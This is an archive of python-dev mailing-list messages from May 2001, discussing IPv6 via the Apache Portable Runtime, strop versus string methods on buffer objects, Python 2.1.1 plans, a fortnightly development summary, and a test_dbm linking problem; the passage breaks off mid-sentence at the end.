In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com>; from guido@digicool.com on Thu, May 17, 2001 at 02:18:27PM -0400
References: <200105171818.f4HIIRv12891@odiug.digicool.com>
Message-ID: <20010524015258.Z5402@lyra.org>

On Thu, May 17, 2001 at 02:18:27PM -0400, Guido van Rossum wrote:
> What's out IPv6 story?  I recall that someone once sent me patches,
> but they didn't work for me.  Is it time to try again?  In certain
> circles IPv6 support in Python would be enough to switch programming
> languages... :-)

Radical suggestion:

  Toss out a ton of the platform-specific stuff in Python and use the Apache
  Portable Runtime (APR). It has IPv6 in it, but it could also help with
  loading shared libraries, threading, mmap'd files, sockets, etc.

(it won't replace *all* of Python's platform specific stuff; I think Python
 has more coverage than APR does)

Could simplify a number of things for Python, and reduce some of the
maintenance costs...

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From thomas at xs4all.net  Thu May 24 11:01:52 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Thu, 24 May 2001 11:01:52 +0200
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <m3u22bjiz6.fsf@atrus.jesus.cam.ac.uk>; from mwh@python.net on Thu, May 24, 2001 at 08:37:17AM +0100
References: <20010523160025.B690@xs4all.nl> <m3u22bjiz6.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <20010524110152.Q676@xs4all.nl>

[ Answer CC'd to python-dev since it deserves an official answer :) ]

On Thu, May 24, 2001 at 08:37:17AM +0100, Michael Hudson wrote:
> For summarasing purposes, do you have any idea when Python 2.1.1 will
> be released?

> "No" is a perfectly acceptable answer.

Then "No" it is ! Even though I have a fair bit of patches in the queue
right now, I need some more time to check out (no pun intended) the changes
since the fork, and I want to browse the bug list for possible bugs that
should be checked out and fixed for 2.1.1. Another couple of weeks at least,
before a release candidate. It also depends on Moshe; if he actually
releases 2.0.1 anytime soon, I'll hold off on 2.1.1 a bit longer.

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal at lemburg.com  Thu May 24 12:18:50 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 24 May 2001 12:18:50 +0200
Subject: [Python-Dev] strop vs. string
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org>
Message-ID: <3B0CE00A.488C8D73@lemburg.com>

Greg Stein wrote:
> 
> On Mon, May 14, 2001 at 07:14:46PM -0700, Guido van Rossum wrote:
> > Update of /cvsroot/python/python/dist/src/Modules
> > In directory usw-pr-cvs1:/tmp/cvs-serv26415/Modules
> >
> > Modified Files:
> >       stropmodule.c
> > Log Message:
> > Add warnings to the strop module, for to those functions that really
> > *are* obsolete; three variables and the maketrans() function are not
> > (yet) obsolete.
> >
> > Add a compensating warnings.filterwarnings() call to test_strop.py.
> >
> > Add this to the NEWS.
> 
> Something that I ran into the other day...
> 
> >>> ob = some_object_implementing_the_buffer_interface
> >>> string.find(ob, '.')
> (fails because ob does not define the .find method)
> >>> strop.find(ob, '.')
> (succeeds)
> 
> The point is that strop uses the t# to get a ptr/len pair to do its work.
> Thus, it can work on many things that export the buffer interface. Dropping
> strop means we no longer have many of those functions. Instead, the
> functionality must be copied to *every* object that implements the buffer
> interface.
> 
> We can say ob.find() now, but we can't say find(ob) any longer. And saying
> that all objects (which implement the buffer API) must now implement a bunch
> of "standard" methods is awfully burdensome.
> 
> In my particular case, I was trying to do a find on a BufferObject referring
> to a subset of another object. Blam. No good. Thankfully, when I did a
> find() on a mmap object, it worked simply because mmaps happen to define a
> .find method.
> 
> [ of course, the find method on an mmap was totally broken, but I checked in
>   a fix for that (last week or so) ]
> 
> So... my question is: is there any way that we can retain a generic find()
> (and similar functions from the string/strop module) that operates on any
> type that implements the buffer API?
> 
> Maybe there is some way we can do a mixin for Python types? e.g. "this mixin
> implements some standard methods for 8-bit character data (using the buffer
> API), which can be mixed into new Python types" That would reduce the burden
> for new types.

I suppose that in 2.2 we'll be able to build a class/type
hierarchy which then provides these possibilities. I haven't
followed Guido's latest checkins closely though -- could be that
types don't support multiple inheritence.

BTW, wouldn't it suffice to add these methods to buffer objects ?
Then you could write: buffer(ob).find('.').

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From barry at digicool.com  Thu May 24 13:50:34 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Thu, 24 May 2001 07:50:34 -0400
Subject: [Python-Dev] IPv6
References: <200105171818.f4HIIRv12891@odiug.digicool.com>
	<20010524015258.Z5402@lyra.org>
Message-ID: <15116.62858.720241.46017@anthem.wooz.org>

>>>>> "GS" == Greg Stein <gstein at lyra.org> writes:

    GS>   Toss out a ton of the platform-specific stuff in Python and
    GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but
    GS> it could also help with loading shared libraries, threading,
    GS> mmap'd files, sockets, etc.

I don't know squat about APR, but would it have to be either-or?  IOW,
would it be possible to wrap the APR in a module (or package) and
provide it as an importable alternative?

-Barry


From mal at lemburg.com  Thu May 24 14:22:42 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 24 May 2001 14:22:42 +0200
Subject: [Python-Dev] IPv6
References: <200105171818.f4HIIRv12891@odiug.digicool.com>
		<20010524015258.Z5402@lyra.org> <15116.62858.720241.46017@anthem.wooz.org>
Message-ID: <3B0CFD12.164271D8@lemburg.com>

"Barry A. Warsaw" wrote:
> 
> >>>>> "GS" == Greg Stein <gstein at lyra.org> writes:
> 
>     GS>   Toss out a ton of the platform-specific stuff in Python and
>     GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but
>     GS> it could also help with loading shared libraries, threading,
>     GS> mmap'd files, sockets, etc.
> 
> I don't know squat about APR, but would it have to be either-or?  IOW,
> would it be possible to wrap the APR in a module (or package) and
> provide it as an importable alternative?

Should be possible; the problem is: how do you get the APR types
to interact with the original Python ones (e.g. file types). Many
low-level Python functions require the native Python types, so
while wrapping APR as Python module would provide an alternative, that
alternative will most probably not help much w/r to simplifying
portability issues.

FYI, here's what the APR has to offer (taken from the APRDesign
file that comes with Apache 2.0 beta):
"""
The base types in APR
file_io     File I/O, including pipes
lib         A portable library originally used in Apache.  This contains
            memory management, tables, and arrays.
locks       Mutex and reader/writer locks
misc        Any APR type which doesn't have any other place to belong
network_io  Network I/O
shmem       Shared Memory (Not currently implemented)   
signal      Asynchronous Signals
threadproc  Threads and Processes
time        Time 
"""

It currently supports: Unix (includes BeOS), Win32 and OS/2.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From gstein at lyra.org  Thu May 24 14:55:55 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 05:55:55 -0700
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <3B0CFD12.164271D8@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 02:22:42PM +0200
References: <200105171818.f4HIIRv12891@odiug.digicool.com> <20010524015258.Z5402@lyra.org> <15116.62858.720241.46017@anthem.wooz.org> <3B0CFD12.164271D8@lemburg.com>
Message-ID: <20010524055555.B5402@lyra.org>

On Thu, May 24, 2001 at 02:22:42PM +0200, M.-A. Lemburg wrote:
> "Barry A. Warsaw" wrote:
> > >>>>> "GS" == Greg Stein <gstein at lyra.org> writes:
> > 
> >     GS>   Toss out a ton of the platform-specific stuff in Python and
> >     GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but
> >     GS> it could also help with loading shared libraries, threading,
> >     GS> mmap'd files, sockets, etc.
> > 
> > I don't know squat about APR, but would it have to be either-or?  IOW,
> > would it be possible to wrap the APR in a module (or package) and
> > provide it as an importable alternative?

Sure, that is a possibility, but it doesn't save Python much in terms of
maintenance or portability. "Just another library"

Truly using it could certainly be done as a slow migration, and it is
definitely possible to only use portions, subsets, etc. Another alternative
would be to use APR as a "platform target". But that just adds yet another
platform to support rather than simplifying.

> Should be possible; the problem is: how do you get the APR types
> to interact with the original Python ones (e.g. file types). Many

The header is a total misnomer, but "apr_portable.h" provides access to an
opaque type's underlying native object (many of us aren't sure how Ryan
arrived at "portable" being the name for the least-portable aspect of the
library :-). Anyways... you can extract a file descriptor from a file or
socket or pipe. Or a thread ID from an thread object. etc.

> low-level Python functions require the native Python types, so
> while wrapping APR as Python module would provide an alternative, that
> alternative will most probably not help much w/r to simplifying
> portability issues.

Right. I'd say use the APR functions unless absolute speed is required (such
as the readlines stuff). But you could also argue that the hard-core
platform specific optimizations could go into APR itself, so that Python
doesn't have to worry about them.

> FYI, here's what the APR has to offer (taken from the APRDesign
> file that comes with Apache 2.0 beta):
> """
> The base types in APR
> file_io     File I/O, including pipes
> lib         A portable library originally used in Apache.  This contains
>             memory management, tables, and arrays.
> locks       Mutex and reader/writer locks
> misc        Any APR type which doesn't have any other place to belong
> network_io  Network I/O
> shmem       Shared Memory (Not currently implemented)   
> signal      Asynchronous Signals
> threadproc  Threads and Processes
> time        Time 
> """

That doc is out of date; the list is missing: shared library handling, i18n,
mmap, user information access (e.g. getpwnam), uuid handling, getopt
replacements, cryptographic random data, and a few other bits here and
there. The shared mem actually is implemented mostly, via the libmm library.

And note that some of those topics have some nice depth. As I mentioned,
network_io supports IPv6, but also portable name lookups, sendfile(), etc.
The file_io stuff support optimized stat() and opendir-type calls for the
platform.

> It currently supports: Unix (includes BeOS), Win32 and OS/2.

A lot more than that :-)  Pretty much all the Unix variants, including
OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. 

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From gstein at lyra.org  Thu May 24 15:00:16 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 06:00:16 -0700
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0CE00A.488C8D73@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 12:18:50PM +0200
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com>
Message-ID: <20010524060016.D5402@lyra.org>

On Thu, May 24, 2001 at 12:18:50PM +0200, M.-A. Lemburg wrote:
> Greg Stein wrote:
>...
> > So... my question is: is there any way that we can retain a generic find()
> > (and similar functions from the string/strop module) that operates on any
> > type that implements the buffer API?
> > 
> > Maybe there is some way we can do a mixin for Python types? e.g. "this mixin
> > implements some standard methods for 8-bit character data (using the buffer
> > API), which can be mixed into new Python types" That would reduce the burden
> > for new types.
> 
> I suppose that in 2.2 we'll be able to build a class/type
> hierarchy which then provides these possibilities. I haven't
> followed Guido's latest checkins closely though -- could be that
> types don't support multiple inheritence.

No idea either... that's why I asked.

> BTW, wouldn't it suffice to add these methods to buffer objects ?
> Then you could write: buffer(ob).find('.').

You're totally missing the point with that suggestion. It does *not* suffice
to add them to buffer objects. What about array objects? mmap objects?
Random Joe Object who implements the buffer interface?

All of those are out of luck.

With strop, I can pass any of those objects to strop.find(). That function
has a polymorphic argument.

In the current arrangement, every object must implement their own .find and
.upper and .whatever.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From mwh at python.net  Thu May 24 15:02:34 2001
From: mwh at python.net (Michael Hudson)
Date: Thu, 24 May 2001 14:02:34 +0100 (BST)
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <20010524055555.B5402@lyra.org>
Message-ID: <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>

I can't think of a good way of expressing this, but I don't think we
should try to make writing non cross-platform code in Python impossible.
Yes, it should be easy to write x-platform code, but if there's some very
specific platform trick I can do with, say, setsockopt, I don't want
Python to hide it from me just 'cause it doesn't work on VMS.

Maybe this isn't an issue here.

On Thu, 24 May 2001, Greg Stein wrote:
[...]
> That doc is out of date; the list is missing: shared library handling, i18n,
> mmap, user information access (e.g. getpwnam), uuid handling, getopt
> replacements, cryptographic random data, and a few other bits here and
> there. The shared mem actually is implemented mostly, via the libmm library.

How big is APR?  How stable?  (in terms of interface; I'm assuming it
doesn't crap out through bad programming or it'd be a non-starter)

> And note that some of those topics have some nice depth. As I mentioned,
> network_io supports IPv6, but also portable name lookups, sendfile(), etc.
> The file_io stuff support optimized stat() and opendir-type calls for the
> platform.
>
> > It currently supports: Unix (includes BeOS), Win32 and OS/2.
>
> A lot more than that :-)  Pretty much all the Unix variants, including
> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs.

That's still less than Python isn't it?  RiscOS, Amiga, PalmOS, VMS,
Playstation 2(!), from looking at
http://www.python.org/download/download_other.html.

Cheers,
M.


From gstein at lyra.org  Thu May 24 15:59:21 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 06:59:21 -0700
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>; from mwh@python.net on Thu, May 24, 2001 at 02:02:34PM +0100
References: <20010524055555.B5402@lyra.org> <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>
Message-ID: <20010524065921.E5402@lyra.org>

On Thu, May 24, 2001 at 02:02:34PM +0100, Michael Hudson wrote:
> I can't think of a good way of expressing this, but I don't think we
> should try to make writing non cross-platform code in Python impossible.

I don't think this would preclude writing non cross-platform code. As I
mentioned, there isn't anything that would prevent the stuff from working
side by side.

The idea is to simplify certain aspects of Python's platform specific stuff.
For example: all those variants of dynamically loading shared modules
(Python/dynload_*.c) can be tossed along with the config magic.

> Yes, it should be easy to write x-platform code, but if there's some very
> specific platform trick I can do with, say, setsockopt, I don't want
> Python to hide it from me just 'cause it doesn't work on VMS.

APR isn't a least common denominator approach.

>...
> > That doc is out of date; the list is missing: shared library handling, i18n,
> > mmap, user information access (e.g. getpwnam), uuid handling, getopt
> > replacements, cryptographic random data, and a few other bits here and
> > there. The shared mem actually is implemented mostly, via the libmm library.
> 
> How big is APR?

That's relative :-)  On my Linux box, a stripped library is 85k.

It is also (theoretically) possible to skip building portions of APR. The
APIs and symbols are set up for that, but the autoconf setup isn't yet. If
you're embedding a private APR build, then you can fine tune what is needed.
However, if you're building a public/shared one, then you wouldn't really
want to trim it back like that.

> How stable?

The existing functionality is quite stable. We just keep adding more, though
:-)

> (in terms of interface; I'm assuming it
> doesn't crap out through bad programming or it'd be a non-starter)

hehe... you can call it a non-starter, then. APR assumes you pass it valid
pointers and objects. For example, if you call apr_file_read(NULL, NULL,
100), then you'll get a segfault rather than EINVAL. Personally, I find that
behavior quite fine (EINVAL will invariably get ignored; a segfault doesn't;
and this is a programmer error that needs to be attended to -- throw it in
his face)

Whether others think that is a non-starter... hard to know :-)

[ actually, one of the hardest things to integrate would be APR's memory
  management approach with Python's ]

> > And note that some of those topics have some nice depth. As I mentioned,
> > network_io supports IPv6, but also portable name lookups, sendfile(), etc.
> > The file_io stuff support optimized stat() and opendir-type calls for the
> > platform.
> >
> > > It currently supports: Unix (includes BeOS), Win32 and OS/2.
> >
> > A lot more than that :-)  Pretty much all the Unix variants, including
> > OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs.
> 
> That's still less than Python isn't it?  RiscOS, Amiga, PalmOS, VMS,
> Playstation 2(!), from looking at
> http://www.python.org/download/download_other.html.

Sure it's smaller.

It's a blue sky radical suggestion. No more, no less. :-) I mentioned it
because the IPv6 stuff came up. I already know a codebase that has handled
all the portability issues. That is a bonus :-)

However, for the platforms that APR *does* handle today, that would still be
a big code reduction for Python. And in the future? Why not extend APR to
those other platforms and reduce the Python code even more.


I think shifting Python to a portability library is actually quite an
interesting thought experiment. Enough to mention it and get people
thinking. I think it could be quite handy for the longer term
maintainability.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From mal at lemburg.com  Thu May 24 16:54:24 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 24 May 2001 16:54:24 +0200
Subject: [Python-Dev] strop vs. string
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org>
Message-ID: <3B0D20A0.3C881F89@lemburg.com>

Greg Stein wrote:
> 
> On Thu, May 24, 2001 at 12:18:50PM +0200, M.-A. Lemburg wrote:
> > Greg Stein wrote:
> >...
> > > So... my question is: is there any way that we can retain a generic find()
> > > (and similar functions from the string/strop module) that operates on any
> > > type that implements the buffer API?
> > >
> > > Maybe there is some way we can do a mixin for Python types? e.g. "this mixin
> > > implements some standard methods for 8-bit character data (using the buffer
> > > API), which can be mixed into new Python types" That would reduce the burden
> > > for new types.
> >
> > I suppose that in 2.2 we'll be able to build a class/type
> > hierarchy which then provides these possibilities. I haven't
> > followed Guido's latest checkins closely though -- could be that
> > types don't support multiple inheritence.
> 
> No idea either... that's why I asked.
> 
> > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > Then you could write: buffer(ob).find('.').
> 
> You're totally missing the point with that suggestion. It does *not* suffice
> to add them to buffer objects. What about array objects? mmap objects?
> Random Joe Object who implements the buffer interface?

That's the point: you can wrap all those into a buffer object
and then use the buffer object methods to manipulate them. In
that sense, buffer objects provide an adaptor to the underlying
object which implements the needed methods.
 
> All of those are out of luck.
> 
> With strop, I can pass any of those objects to strop.find(). That function
> has a polymorphic argument.
> 
> In the current arrangement, every object must implement their own .find and
> .upper and .whatever.
> 
> Cheers,
> -g
> 
> --
> Greg Stein, http://www.lyra.org/

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From skip at pobox.com  Thu May 24 17:55:23 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 24 May 2001 10:55:23 -0500
Subject: [Python-Dev] strop vs. string
In-Reply-To: <20010524060016.D5402@lyra.org>
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net>
	<20010524013349.Y5402@lyra.org>
	<3B0CE00A.488C8D73@lemburg.com>
	<20010524060016.D5402@lyra.org>
Message-ID: <15117.12011.323759.496982@beluga.mojam.com>

    Greg> With strop, I can pass any of those objects to strop.find(). That
    Greg> function has a polymorphic argument.

Where doesn't strop compile/run?  If it works everywhere, either just rename
it to be the string module (copying any bits from the existing string module
that it doesn't yet have) or rename it something like buffer_funcs.

Skip


From skip at pobox.com  Thu May 24 17:58:24 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 24 May 2001 10:58:24 -0500
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>
References: <20010524055555.B5402@lyra.org>
	<Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>
Message-ID: <15117.12192.114564.111578@beluga.mojam.com>

    >> > It currently supports: Unix (includes BeOS), Win32 and OS/2.
    >> 
    >> A lot more than that :-) Pretty much all the Unix variants, including
    >> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs.

    Michael> That's still less than Python isn't it?  RiscOS, Amiga, PalmOS,
    Michael> VMS, Playstation 2(!),

Not to mention MacOS < X... ;-)

Skip


From mwh at python.net  Thu May 24 18:38:37 2001
From: mwh at python.net (Michael Hudson)
Date: Thu, 24 May 2001 17:38:37 +0100 (BST)
Subject: [Python-Dev] python-dev summary 2001-05-10 - 2001-05-24
Message-ID: <Pine.LNX.4.30.0105241737010.21946-100000@localhost.localdomain>

 This is a summary of traffic on the python-dev mailing list between
 May 10 and May 24 (inclusive) 2001.  It is intended to inform the
 wider Python community of ongoing developments.  To comment, just
 post to python-list at python.org or comp.lang.python in the usual
 way. Give your posting a meaningful subject line, and if it's about a
 PEP, include the PEP number (e.g. Subject: PEP 201 - Lockstep
 iteration) All python-dev members are interested in seeing ideas
 discussed by the community, so don't hesitate to take a stance on a
 PEP if you have an opinion.

 This is the eighth summary written by Michael Hudson.
 Summaries are archived at:

  <http://starship.python.net/crew/mwh/summaries/>

   Posting distribution (with apologies to mbm)

   Number of articles in summary: 322

       |                         [|]
       |                         [|]
    30 |                         [|]
       |                     [|] [|] [|]                     [|]
       |                     [|] [|] [|]                     [|]
       |                 [|] [|] [|] [|]                     [|]
       |                 [|] [|] [|] [|]                     [|]
       |     [|]         [|] [|] [|] [|] [|]                 [|]
    20 | [|] [|]         [|] [|] [|] [|] [|]                 [|]
       | [|] [|]         [|] [|] [|] [|] [|]             [|] [|]
       | [|] [|]     [|] [|] [|] [|] [|] [|]         [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]         [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
    10 | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|]
     0 +-023-025-017-018-028-031-036-032-025-002-015-018-020-032
        Thu 10| Sat 12| Mon 14| Wed 16| Fri 18| Sun 20| Tue 22|
            Fri 11  Sun 13  Tue 15  Thu 17  Sat 19  Mon 21  Wed 23

 Pretty busy fortnight.  The above distribution may be somewhat skewed
 because I changed my subscription address to python-dev and was
 unsubscribed for a while.  Although any impact this had is probably
 countered by ESR and Barry's discussion of "Puffy the Frog"...


    * Type/class *

 Paul Prescod has been keeping an eye on Guido's descr-branch work,
 and posted concerns about when objects will have a __dict__:

  <http://mail.python.org/pipermail/python-dev/2001-May/014694.html>

 Then there was more technical discussion about subclassing builtin
 types and Steven Majewski evangelising prototype-based OO languages
 (though I'm not sure why!).


    * Easy codec access *

 Marc-Andre Lemburg checked in his decode string method patch, and
 some new codecs so you can now do things like:

    >>> "abc".encode('zlib').encode('base64')
    'eJxLTEoGAAJNASc=\n'
    >>> _.decode('base64').decode('zlib')
    'abc'

 There was a small discussion on what other codecs might be handy and
 Guido added quoted-printable to check it was easy.


    * Performance *

 The big discussion(s) on python-dev over the past fourteen days has
 centred on performance, especially on that of comparisons and the
 related area of dict performance.  It all started with Tim Peters
 running a simple test program on 2.0, 2.1 and current CVS:

  <http://mail.python.org/pipermail/python-dev/2001-May/014781.html>

 The discussion had an unusual <wink> flavour for one about
 performance: a concentration on measuring performance numbers and
 making sure that the optimizations being discussed actually improved
 these numbers.  This is hard; everyone wants to speed the "typical
 Python app" but of course there is no such thing; people have been
 using, amongst others, pystone, pybench and the test suite, none of
 which are particularly good candidates...

 Tim posted the distribution of sizes of dicts in a run of the test
 suite:

  <http://mail.python.org/pipermail/python-dev/2001-May/014890.html>

 which showed that small dicts are overwhelmingly the commonest.  Marc
 piped up with an old optimization idea of his:

  <http://mail.python.org/pipermail/python-dev/2001-May/014891.html>

 He posted a patch to sourceforge, Tim rewrote it and checked it in,
 so dicts should be a little faster in 2.2.

 But as I said, the discussion was kicked off by the performance of
 comparisons, especially strings.  Martin von Loewis posted some
 statistics from an instrumented interpreter:

  <http://mail.python.org/pipermail/python-dev/2001-May/014808.html>

 The issue is that the rich comparisons of Python 2.1 have added a
 layer of complexity to the comparisons code.  Although the rich
 comparisons (might) provide an opportunity for faster code in some
 circumstances, code that still uses old-style comparisons can and
 does take a hit.  Strings still use the old-style comparisons and are
 compared a *lot* (especially in dicts), so it seems "upgrading" them
 to rich comparisons should be a win and Marc posted a patch to sf
 that does this.

 Marc also managed to promise <wink> to make a concerted effort to
 find speed optimizations in the next few months:

  <http://mail.python.org/pipermail/python-dev/2001-May/014928.html>

 Finally, in a coda Jeremy noticed that Python spends an alarming
 amount of time decoding those "Oi|s#" strings that get passed to
 PyArg_ParseTuple:

  <http://mail.python.org/pipermail/python-dev/2001-May/014911.html>

 and Tim pointed out that optimizing "O" might be a win:

  <http://mail.python.org/pipermail/python-dev/2001-May/014924.html>

    * FP vs. tutorial *

 Tim pointed out that the tutorial currently contains examples of
 floating point output that is platform dependent, and that this is
 bad.  He proposed changing the tutorial to only use fractions that
 can be exactly represented as floats, and adding a discussion
 (possibly in an appendix) of the reasons why

    >>> 0.1
    0.10000000000000001

 is not broken.  There was a discussion of how detailed the discussion
 should be where the point was made that it's not really important to
 explain precisely *why* this happens, but it suffices to convince the
 newbie that floating point is more complicated than he or she thinks.
 Lets hope that suitable text is composed soon, and that people
 actually read it ... there have been two "floating point is broken"
 bug reports on sourceforge in just the last week.


    * unifying os.rename semantics across platforms *

 Skip pointed out that os.rename behaves differently on Posix and
 Windows platforms when the destination file exists:

  <http://mail.python.org/pipermail/python-dev/2001-May/014957.html>

 on Posix the destination is silently replaced in an atomic operation,
 whereas on Windows an exception is raised.  Skip proposed enforcing
 posix semantics everywhere, but this has two problems (a) it's
 backwards incompatible (b) it's impossible (you can't avoid the race
 condition on Windows).  So maybe we'll just settle for better
 documentation.


    * Python 2.1.1 *

 Thomas Wouters started back-porting bug fixes to the 2,1-maint branch
 in preparation for a 2.1.1 release.  There is as yet no firm - or
 even vague - plans about release dates.


    * Daily Python-URL on your Palm *

 Marc-Andre Lemburg announced that you can now read Pythonware's Daily
 Python-URL on your Palm Pilot as an AvantGo channel:

  <http://mail.python.org/pipermail/python-dev/2001-May/014983.html>

Cheers,
M.


From gstein at lyra.org  Thu May 24 21:45:18 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 12:45:18 -0700
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0D20A0.3C881F89@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 04:54:24PM +0200
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com>
Message-ID: <20010524124518.N5402@lyra.org>

On Thu, May 24, 2001 at 04:54:24PM +0200, M.-A. Lemburg wrote:
>...
> That's the point: you can wrap all those into a buffer object
> and then use the buffer object methods to manipulate them. In
> that sense, buffer objects provide an adaptor to the underlying
> object which implements the needed methods.

That would certainly be a valid solution. And at the C level, we could share
functions between PyBufferObject and PyStringObject.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From gstein at lyra.org  Thu May 24 22:07:43 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 13:07:43 -0700
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <15117.12192.114564.111578@beluga.mojam.com>; from skip@pobox.com on Thu, May 24, 2001 at 10:58:24AM -0500
References: <20010524055555.B5402@lyra.org> <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain> <15117.12192.114564.111578@beluga.mojam.com>
Message-ID: <20010524130743.O5402@lyra.org>

On Thu, May 24, 2001 at 10:58:24AM -0500, skip at pobox.com wrote:
> 
>     >> > It currently supports: Unix (includes BeOS), Win32 and OS/2.
>     >> 
>     >> A lot more than that :-) Pretty much all the Unix variants, including
>     >> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs.
> 
>     Michael> That's still less than Python isn't it?  RiscOS, Amiga, PalmOS,
>     Michael> VMS, Playstation 2(!),
> 
> Not to mention MacOS < X... ;-)

As I mentioned, MacOS X is already there. MacOS Classic is not.

But the presence of a portability library such as APR does not exclude the
use of direct platform hooks where/when necessary. For a bunch of stuff, you
use APR [to reduce complexity/maintenance]. For the rest, you go native just
like today.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From skip at pobox.com  Thu May 24 23:15:48 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 24 May 2001 16:15:48 -0500
Subject: [Python-Dev] Odd message from test_dbm
Message-ID: <15117.31236.804746.160037@beluga.mojam.com>

I just noticed this message when running make test:

    test test_dbm skipped --  /home/skip/src/python/dist/src/build/build/lib.linux-i686-2.1/dbm.so: undefined symbol: dbm_firstkey

I'm running a vanilla Mandrake 8.0 system.  Unfortunately, I can't check
libc.so or /usr/lib/libgdbm.so because the Mandrake folks saw fit to strip
them...

Anybody else seen this?  

Skip


From thomas at xs4all.net  Thu May 24 23:42:58 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Thu, 24 May 2001 23:42:58 +0200
Subject: [Python-Dev] Odd message from test_dbm
In-Reply-To: <15117.31236.804746.160037@beluga.mojam.com>; from skip@pobox.com on Thu, May 24, 2001 at 04:15:48PM -0500
References: <15117.31236.804746.160037@beluga.mojam.com>
Message-ID: <20010524234258.I690@xs4all.nl>

On Thu, May 24, 2001 at 04:15:48PM -0500, skip at pobox.com wrote:

> I just noticed this message when running make test:

>     test test_dbm skipped --  /home/skip/src/python/dist/src/build/build/lib.linux-i686-2.1/dbm.so: undefined symbol: dbm_firstkey

> I'm running a vanilla Mandrake 8.0 system.  Unfortunately, I can't check
> libc.so or /usr/lib/libgdbm.so because the Mandrake folks saw fit to strip
> them...

The problem is that the dbmmodule isn't linked to the right library. Debian
has a similar (if not the same) problem. setup.py doesn't try hard enough to
figure out the right library to link with; it checks for libndbm, but not
libdbm or libgdbm (it assumes DBM support is in libc if not in libndbm.)
I *think* all it needs to do is check for libdbm as well as libndbm, but
this might pick up old/incompatible libraries on some platforms, and it
might still require fiddling of include paths on others. I seem to recall
you had to include either /usr/include/db1/ndbm.h (to use libdbm) or
